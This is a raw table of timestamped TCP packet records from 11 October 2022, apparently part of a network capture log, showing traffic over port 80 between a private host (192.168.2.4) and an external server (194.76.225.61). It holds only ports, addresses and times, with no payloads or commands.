Oct 11, 2022 15:04:23.166685104 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166704893 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166722059 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166738987 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166770935 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166785955 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166799068 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.166800022 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.166831970 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167412043 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167438984 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167457104 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167474031 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167491913 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167505980 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167515039 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167515039 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167538881 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167556047 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167566061 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167572975 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167592049 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167618990 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167629957 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167639971 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167648077 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167659998 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.167689085 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167717934 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.167994976 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168014050 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168030977 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168047905 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168065071 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168071985 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.168076992 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168100119 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.168122053 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.168262959 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168282032 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168298960 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.168313980 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.168337107 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.184079885 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.210522890 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.350198984 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.350234985 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.350253105 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.350267887 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.350287914 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.350337029 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.350337029 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.351391077 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.351413012 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.351428986 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.351442099 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.351447105 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.351488113 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.353341103 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.353363037 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.353380919 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.353389978 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.353429079 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.353481054 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.355676889 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.355709076 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.355729103 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.355745077 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.355743885 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.355787039 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.355787039 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.356750965 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.356775999 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.356795073 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.356808901 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.356811047 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.356838942 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.356838942 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.357037067 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.357059002 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.357079983 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.357095003 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.357094049 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.357094049 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.357129097 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.359020948 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.359044075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.359062910 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.359081984 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.359101057 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.359122038 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.359168053 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.361418962 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.361454964 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.361471891 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.361485004 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.361494064 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.361494064 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.361526012 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.362323046 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.362348080 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.362359047 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.362364054 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.362376928 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.362528086 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.364487886 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.364509106 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.364559889 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.364559889 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.364588022 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.364598989 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.364639044 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.366923094 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.366947889 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.366964102 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.366976023 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.367016077 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.367016077 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.367248058 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.367268085 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.367312908 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.367336035 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.367399931 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.367419958 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.367433071 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.367454052 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.367468119 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.368361950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.368382931 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.368400097 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.368412018 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.368438959 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.368438959 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.370191097 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.370218992 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.370234966 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.370249033 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.370273113 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.370301008 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.372961044 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.372982979 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.372999907 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.373013020 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.373024940 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.373054981 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.373608112 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.373637915 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.373677015 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.373686075 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.373692036 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.373697996 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.373718023 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.376110077 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376144886 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376162052 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376178026 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376188993 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.376195908 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376211882 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.376213074 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376236916 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.376249075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376255035 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.376261950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376283884 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.376501083 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.376544952 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.378180981 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.378200054 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.378243923 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.378267050 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.378268003 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.378281116 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.378305912 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.379101992 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379121065 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379137993 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379149914 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379152060 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.379177094 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.379187107 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.379568100 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379582882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379595995 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379664898 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.379755974 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.379801035 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.381510973 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.381582975 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.381597996 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.381603003 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.381614923 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.381638050 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.381654024 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.383666992 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.383704901 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.383723021 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.383735895 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.383791924 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.383831978 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.384288073 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.384309053 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.384325027 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.384354115 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.384356022 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.384370089 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.384385109 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.384411097 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.385226965 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.385252953 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.385270119 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.385282993 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.385293961 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.385328054 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.387140989 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.387161016 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.387177944 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.387190104 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.387216091 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.387242079 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.389362097 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389383078 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389400005 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389413118 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389422894 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.389448881 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.389771938 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389854908 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389885902 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.389894009 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389897108 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.389908075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.389933109 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.391022921 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.391064882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.391077995 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.391093969 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.391103029 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.391124964 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.391127110 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.391149998 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.391165972 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.392700911 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.392736912 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.392750978 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.392770052 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.392779112 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.392796993 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.392803907 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.393265963 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.393326998 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.393332958 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.393362045 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.393366098 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.393399954 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.393402100 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.396203995 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.396241903 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.396274090 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.396274090 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.396301031 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.396301031 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.396313906 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.396989107 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397027969 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397043943 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397058010 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397074938 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397085905 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.397093058 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397109985 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.397109985 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.397130966 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.398519993 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.398545027 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.398561001 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.398571968 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.398576975 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.398588896 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.398616076 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.398638010 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.399157047 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.399175882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.399193048 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.399224043 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.399239063 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.401526928 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.401549101 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.401565075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.401577950 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.401597023 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.401631117 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.402637005 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.402657032 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.402674913 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.402705908 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.402704954 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.402731895 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.402903080 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.402956009 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.403254032 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.403274059 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.403327942 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.403342009 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.403343916 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.403368950 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.403368950 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.404064894 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404115915 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404124022 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.404134989 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404148102 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404155016 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.404182911 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.404675961 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404695988 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404730082 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.404759884 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.404782057 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404795885 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.404822111 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.407155037 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.407176971 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.407192945 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.407205105 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.407212973 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.407237053 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.408269882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.408292055 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.408309937 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.408322096 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.408361912 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.408387899 CEST	49703	80	192.168.2.4	194.76.225.61
